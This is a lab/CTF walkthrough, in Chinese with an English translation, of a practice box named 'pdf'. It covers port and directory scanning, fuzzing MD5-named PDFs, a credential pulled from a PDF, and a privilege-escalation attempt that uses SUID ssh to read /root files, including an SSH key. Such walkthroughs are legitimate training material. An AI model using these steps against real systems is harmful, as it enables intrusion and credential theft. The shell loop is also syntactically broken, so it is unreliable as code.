mazesec pdf
信息收集
# Nmap 7.95 scan initiated Tue Dec 16 11:56:36 2025 as: /usr/lib/nmap/nmap --privileged -Pn -p22,80,8080 -sC -sV -oA ./Recon/192.168.110.57 192.168.110.57
Nmap scan report for pdf.lan (192.168.110.57)
Host is up (0.00076s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: The Evolution of PDF Format
8080/tcp open http Golang net/http server
|_http-title: File Management System
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Date: Tue, 16 Dec 2025 11:56:49 GMT
| Content-Length: 1415
| Content-Type: text/html; charset=utf-8
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <title>File Management System</title>
| <style>
| body { font-family: Arial, sans-serif; margin: 40px; background-color: #f4f4f4; }
| .container { max-width: 800px; margin: auto; padding: 20px; background: white; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
| text-align: center; color: #333; }
| .error { color: red; text-align: center; }
| .hint { color: #555; text-align: center; font-style: italic; }
| input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 4px; }
| button { width: 100%; padding: 10px; background: #007bff; color: white; border: none; border-radius: 4px; cursor: pointer; }
|_ button
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :漏洞分析
http://192.168.110.57/ // 查看源代码找到338行
➜ Pdf gobuster dir -u <http://192.168.110.57/> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: <http://192.168.110.57/>
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/hint.txt (Status: 200) [Size: 44]
/server-status (Status: 403) [Size: 279]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================
➜ curl http://192.168.110.57/hint.txt ➜number 42
➜ http://192.168.110.57:8080/ // 输入42即可进入发现搜索文件名字是1的MD5值,所以我们创建1-100的MD5.pdf
for i in {1...100}:do
hash=$(echo -n "$i" | md5sum | awk '{print $1}')
echo -n "{hash}.pdf" >> payload.txt
doneffuf -u http://192.168.110.57:8080/view/\?filename\=FUZZ -w payload_list.txt -b "session_token=42" -fs 1779,1193
# 发现72b32a1f754ba1c09b3695e0cb6cde7f.pdf [Status: 200, Size: 1219, Words: 108, Lines: 81, Duration: 9ms]利用
将不寻常的pdf文件保存在本地
strings id_57.pdf得到welcome:lamar57
权限提升
welcome@pdf:~$ find / -perm -4000 2>/dev/null
/usr/bin/sshLFILE=/root/root.txt
ssh -F $LFILE localhost
# 不能读取/root/.ssh/id.rsa 因为读取出来的全是小写字母
# 找不到提权路径了经验教训
对72b32a1f754ba1c09b3695e0cb6cde7f.pdf 不坚定
mazesec pdf
Information Gathering
<TRANSLATED>
# Nmap 7.95 scan initiated on Tuesday, December 16, 2025, at 11:56:36, using the following command:
`/usr/lib/nmap/nmap --privileged -Pn -p22,80,8080 -sC -sV -oA ./Recon/192.168.110.57 192.168.110.57`
Nmap scan report for the target `pdf.lan` (192.168.110.57):
The host is online (latency: 0.00076 seconds).
**Port | State | Service | Version**
--- | ------- | ------- | --------
22/tcp | open | ssh | OpenSSH 8.4p1 (Debian 5+deb11u3, protocol 2.0)
| | | | |
| | | ssh-hostkey: | RSA key fingerprint
| | | | |
| | | | ECDSA key fingerprint
| | | | ED25519 key fingerprint
80/tcp | open | http | Apache httpd 2.4.62 (Debian)
| | | | |
| | | http-server-header: | Apache/2.4.62 (Debian)
| | | | |
| | | http-title: | The Evolution of PDF Format
8080/tcp | open | http | Golang-based HTTP server
| | | | |
| | | http-title: | File Management System
**Fingerprint strings:**
| | | HTTP/1.0 200 OK
| | | Date: Tue, 16 Dec 2025 11:56:49 GMT
| | | Content-Length: 1415
| | | Content-Type: text/html; charset=utf-8
| | | <!DOCTYPE html>
| | | <html lang="en">
| | | | |
| | | | |
| | | | |
| | | | |
| | | | |
| | | | |
| | | | |
| | | | |
| | | | |
| | | | |
| | | | |
**Note:** One service (port 8080) returned data, but it was not recognized by Nmap. If you know the service and its version, please submit the following information at:
`https://nmap.org/cgi-bin/submit.cgi?new-service`
# Vulnerability Analysis
[http://192.168.110.57/](http://192.168.110.57/) // Visit the source code to find line 338 (hint: .txt)
```bash
➜ pdf gobuster dir -u <http://192.168.110.57/> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] URL: <http://192.168.110.57/>
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/hint.txt (Status: 200) [Size: 44]
/server-status (Status: 403) [Size: 279]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================
➜ curl http://192.168.110.57/hint.txt ➜ Number 42
➜ http://192.168.110.57:8080/ // Entering the system by providing the value “42”We discovered that the file names are MD5 hashes of the numbers 1 to 100; therefore, we created MD5.pdf files for each of these numbers (from 1 to 100).
for i in {1...100}: do
hash=$(echo -n "$i" | md5sum | awk '{print $1}')
echo -n "{hash}.pdf" >> payload.txt
doneffuf -u http://192.168.110.57:8080/view/\?filename\=FUZZ -w payload_list.txt -b "session_token=42" -fs 1779,1193
# The file “72b32a1f754ba1c09b3695e0cb6cde7f.pdf” was found. [Status: 200, Size: 1219, Words: 108, Lines: 81, Duration: 9ms]Exploitation
Save the obtained PDF files locally.
Use the strings command on the file id_57.pdf to extract the password “welcome:lamar57”.
Privilege Escalation
welcome@pdf:~$ find / -perm -4000 2>/dev/null
/usr/bin/sshLFILE=/root/root.txt
ssh -F $LFILE localhost
# We cannot read the file `/root/.ssh/id.rsa` because the contents are all in lowercase letters.
# We cannot find a path to escalate privileges.Lessons Learned
Lack of confidence in the file 72b32a1f754ba1c09b3695e0cb6cde7f.pdf